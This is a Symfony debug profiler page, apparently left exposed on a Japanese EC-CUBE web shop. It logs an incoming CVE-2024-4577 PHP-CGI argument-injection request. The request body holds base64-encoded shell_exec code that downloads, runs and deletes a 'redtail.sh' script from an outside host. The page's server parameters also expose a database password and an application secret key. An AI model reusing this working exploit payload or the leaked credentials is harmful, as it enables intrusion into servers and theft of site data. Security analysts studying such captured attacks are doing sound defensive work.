http:///?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

n/a

Request

GET Parameters

Key Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcDsgY3VybCBodHRwOi8vMTc4LjE2LjU1LjIyNC9zaCAtbyByZWR0YWlsLnNoIHx8IHdnZXQgaHR0cDovLzE3OC4xNi41NS4yMjQvc2ggLU8gcmVkdGFpbC5zaDsgY2htb2QgK3ggcmVkdGFpbC5zaDsgLi9yZWR0YWlsLnNoIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcDsgcm0gLXJmIHJlZHRhaWwuc2g
"")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

No attributes

Request Headers

Header Value
accept
"*/*"
authorization
""
connection
"keep-alive"
content-length
"325"
content-type
"application/x-www-form-urlencoded"
host
"194.91.13.116:80"
upgrade-insecure-requests
"1"
user-agent
"libredtail-http"
x-php-ob-level
"1"

Request Content

Raw

<?php shell_exec(base64_decode("Y2QgL3RtcCB8fCBjZCAvdmFyL3RtcDsgY3VybCBodHRwOi8vMTc4LjE2LjU1LjIyNC9zaCAtbyByZWR0YWlsLnNoIHx8IHdnZXQgaHR0cDovLzE3OC4xNi41NS4yMjQvc2ggLU8gcmVkdGFpbC5zaDsgY2htb2QgK3ggcmVkdGFpbC5zaDsgLi9yZWR0YWlsLnNoIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcDsgcm0gLXJmIHJlZHRhaWwuc2g=")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Sat, 22 Nov 2025 06:56:18 GMT"
set-cookie
"maintenance_token=deleted; expires=Fri, 22-Nov-2024 06:56:17 GMT; Max-Age=0; path=/; httponly"
vary
"Accept"
x-debug-token
"9a9508"
x-debug-token-link
"/_profiler/cb64bd"
x-previous-debug-token
"cb64bd"

Cookies

Request Cookies

No request cookies

Response Cookies

Key Value
maintenance_token
Symfony\Component\HttpFoundation\Cookie {#950
  #name: "maintenance_token"
  #value: null
  #domain: null
  #expire: 1
  #path: "/"
  #secure: false
  #httpOnly: true
  -raw: false
  -sameSite: null
  -secureDefault: false
}

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
(no data)

Defined as regular env variables

Key Value
APP_DEBUG
"0"
APP_ENV
"dev"
CONTENT_LENGTH
"325"
CONTENT_TYPE
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT
"/usr/home/hbw1010t44oz/html"
CONTEXT_PREFIX
""
DATABASE_CHARSET
"utf8mb4"
DATABASE_SERVER_VERSION
"5.7.42-log"
DATABASE_URL
"mysql://hbw1010t44oz:kUBWEZXS@127.0.0.1:3306/hbw1010t44oz_ECCUBE3"
DOCUMENT_ROOT
"/usr/home/hbw1010t44oz/html"
ECCUBE_ADMIN_ALLOW_HOSTS
"[]"
ECCUBE_ADMIN_ROUTE
"master"
ECCUBE_AUTH_MAGIC
"773XjB4i6IrdBSIVlGSQgUTsvMrnA8vv"
ECCUBE_COOKIE_PATH
"/"
ECCUBE_FORCE_SSL
"1"
ECCUBE_LOCALE
"ja"
ECCUBE_TEMPLATE_CODE
"default"
GATEWAY_INTERFACE
"CGI/1.1"
HTTP_ACCEPT
"*/*"
HTTP_AUTHORIZATION
""
HTTP_CONNECTION
"keep-alive"
HTTP_HOST
"194.91.13.116:80"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"libredtail-http"
MAILER_DSN
"smtp://localhost:25"
PATH
"/bin:/usr/bin:/usr/local/bin"
PHPRC
"/usr/home/hbw1010t44oz/html/php.ini"
PHP_SELF
"/index.php"
QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_HTTP_AUTHORIZATION
""
REDIRECT_QUERY_STRING
"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS
"200"
REDIRECT_UNIQUE_ID
"aSFeke0hZT9m7oXBlEm7ZAAAAvE"
REDIRECT_URL
"/"
REMOTE_ADDR
"103.163.219.194"
REMOTE_PORT
"50600"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"http"
REQUEST_TIME
1763794577
REQUEST_TIME_FLOAT
1763794577.9886
REQUEST_URI
"/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME
"/usr/home/hbw1010t44oz/html/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"194.91.13.116"
SERVER_ADMIN
"webmaster@kikulon-shop.com"
SERVER_NAME
"194.91.13.116"
SERVER_PORT
"80"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
""
SERVER_SOFTWARE
"Apache"
TRUSTED_HOSTS
"^www\.kikulon-shop\.com$"
UNIQUE_ID
"aSFeke0hZT9m7oXBlEm7ZAAAAvE"

Sub Requests 1

ErrorController (token = cb64bd)

Key Value
_controller
"error_controller"
exception
Symfony\Component\HttpKernel\Exception\BadRequestHttpException {#236
  #message: "Untrusted Host "194.91.13.116"."
  #code: 0
  #file: "/usr/home/hbw1010t44oz/html/vendor/symfony/http-kernel/HttpKernel.php"
  #line: 78
  -previous: Symfony\Component\HttpFoundation\Exception\SuspiciousOperationException {#407 …}
  -statusCode: 400
  -headers: []
  trace: {
    /usr/home/hbw1010t44oz/html/vendor/symfony/http-kernel/HttpKernel.php:78 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › if ($e instanceof RequestExceptionInterface) {    $e = new BadRequestHttpException($e->getMessage(), $e);}
    }
    /usr/home/hbw1010t44oz/html/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /usr/home/hbw1010t44oz/html/index.php:83 {$kernel = new Kernel($env, $debug);$response = $kernel->handle($request);$response->send();
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#229 …9}